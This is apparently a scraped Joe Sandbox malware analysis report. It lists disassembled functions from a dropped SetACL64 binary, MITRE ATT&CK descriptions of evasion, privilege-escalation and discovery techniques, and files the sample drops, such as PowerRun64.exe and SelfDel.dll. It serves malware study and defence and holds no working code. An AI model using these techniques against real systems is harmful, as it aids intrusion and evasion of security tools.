Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
Instruction ID: 404cbae69a388cced9087b609e9ddc220526397fc3701baf575379e0d3a99ea1
Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
Instruction Fuzzy Hash: 8071C9B1A69783C1EA009B64D0887AD6321FF857A4F401539E75D876FADFBEE840C720

Function 00007FF68683D760 Relevance: 22.7, APIs: 15, Instructions: 223synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF68683D89C
ReleaseMutex.KERNEL32 ref: 00007FF68683D8AE
ResetEvent.KERNEL32 ref: 00007FF68683DA41
WaitForSingleObject.KERNEL32 ref: 00007FF68683DA51

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ObjectSingleWait$EventMutexReleaseReset
String ID:
API String ID: 4195719913-0
Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
Instruction ID: 6ffc553d7a659dbefa639c0182d432df865ea05768376e4391a8cd2db22c07c5
Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
Instruction Fuzzy Hash: 3BB17FB2A18BC1C5EB208F25D9583ED2361FF48798F414639DA6C8B7E5DF399980C310

Function 00007FF68683A7F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A859
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF68683A8A4
_Getctype.LIBCPMT ref: 00007FF68683A8BC
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683A94C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A996
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683A9E5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683AA6E

Strings

bad locale name, xrefs: 00007FF68683A96F

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 249287498-1405518554
Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
Instruction ID: 0362ff50ef98fb21abde8038824d2edfecb0dcd294d6f109a18a45e4b1812ec6
Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
Instruction Fuzzy Hash: 7F718DA2B19A81C9FB15DF65D9502BC3364FF54744F080039DF8DA3A96DE3AE952C324

Function 00007FF686859830 Relevance: 15.2, APIs: 10, Instructions: 188COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF68685989B
GetLastError.KERNEL32 ref: 00007FF6868598A5
GetAce.ADVAPI32 ref: 00007FF6868598FA
EqualSid.ADVAPI32 ref: 00007FF686859949
DeleteAce.ADVAPI32 ref: 00007FF686859974
IsValidSid.ADVAPI32 ref: 00007FF68685999F
GetLastError.KERNEL32 ref: 00007FF6868599DA
IsValidSid.ADVAPI32 ref: 00007FF686859A31
GetLastError.KERNEL32 ref: 00007FF686859ADF
GetLastError.KERNEL32 ref: 00007FF686859AF2

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$Valid$DeleteEqualInformation
String ID:
API String ID: 439278688-0
Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
Instruction ID: 344a6eff489a6a41200e9fdbeae6a458f7b893de6cad95c91f516e73a36f76fd
Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
Instruction Fuzzy Hash: CE816BA1A0C6C6CAEE618B26954937967A1FF84B84F080439DA4ED7791DF3EEC50C720

Function 00007FF686887748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 186COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF6868877A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868878BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68688790A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868879EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686887A3B

Strings

Operating system error message: , xrefs: 00007FF686887933
SetACL error message: , xrefs: 00007FF6868877FE
SetACL finished with error(s): , xrefs: 00007FF686887771

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString
String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
API String ID: 498717675-3876775778
Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
Instruction ID: cacafaff8aef16aef4453ca37b0079115f82df94c3156b3a4bae7fc55b23598f
Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
Instruction Fuzzy Hash: 0E81B9A2A59BC6C5EB209F34D8443ED2361FF45788F809139D74C9B656DF6EDA84C310

Function 00007FF68683C7D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 291timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68683C826
FileTimeToSystemTime.KERNEL32 ref: 00007FF68683C84A
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF68683C85B
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF68683C86B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683CB04

Strings

%04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d, xrefs: 00007FF68683C8EC
-, xrefs: 00007FF68683C8BD

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
API String ID: 1697026759-531884627
Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
Instruction ID: 58278bfdf5c43c6d90a3c635f062df40a94726280256f7dbfa058458c7548064
Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
Instruction Fuzzy Hash: CDD14CB2618B81C6DB10DF15F4802AEB7A5FB88B84F50412AEB8D87B68DF7DD545CB10

Function 00007FF68685C766 Relevance: 10.7, APIs: 7, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C89B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685C8A1
CreateFileW.KERNEL32 ref: 00007FF68685C913
GetLastError.KERNEL32 ref: 00007FF68685C922
CreateFileW.KERNEL32 ref: 00007FF68685CA06

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
String ID:
API String ID: 2384231905-0
Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
Instruction ID: f7628ec9d9e294fb19bf9303db138274345bb7d7a282b4d15a6f13d8164fcce6
Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
Instruction Fuzzy Hash: C7816EA2B18642C1EA109B25E45936D6252BF84BE8F40423DDB5E877E9DF3EDC84C760

Function 00007FF686838830 Relevance: 9.1, APIs: 6, Instructions: 80COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838846
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683886B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686838895

Part of subcall function 00007FF6868386B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838719
Part of subcall function 00007FF6868386B0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686838764
Part of subcall function 00007FF6868386B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6868387F4

std::_Facet_Register.LIBCPMT ref: 00007FF686838904
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683891E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF686838933

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID:
API String ID: 3702003507-0
Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
Instruction ID: 33b01e2f854d43ca47ac46108accfcf7d7aae661711a8b56741e44fa92e6f5de
Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
Instruction Fuzzy Hash: D8317EE1A4DA42C1EB15DB55E6400B96360FF85B94F18013ADB8D8B795DE6EEC41C320

Function 00007FF686834810 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834859
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF68683486D
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834882
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834964

Part of subcall function 00007FF6868349B0: VerQueryValueW.VERSION ref: 00007FF686834A5F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868349A5

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 678723381-0
Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
Instruction ID: 7ba90ef05a520d13f77c55ab4759998f6c38476586eb46ada0c00af0494d935f
Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
Instruction Fuzzy Hash: 34419062A19B85C1EA108B24E64536A6361FF85BE4F144238EB9D46AAADF3DF580C710

Function 00007FF686883804 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 218COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF686883AE0

Part of subcall function 00007FF68687DA74: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68687DA91

Strings

ccs, xrefs: 00007FF686883A1B
UTF-8, xrefs: 00007FF686883A5F
UTF-16LEUNICODE, xrefs: 00007FF686883A7E

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
Instruction ID: 8479071785c1584bc1d57f0a077ad4f29f449b10880987e4c186d243a6ac13f6
Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
Instruction Fuzzy Hash: B08192F2E8C642C6FA654EA9855027826A0FF1AB44F55803DDA4DE72A5CF2FEC01D721

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4hIPvzV6a2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\Ryvnxbtsbt.ico

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe.config

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
4hIPvzV6a2.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
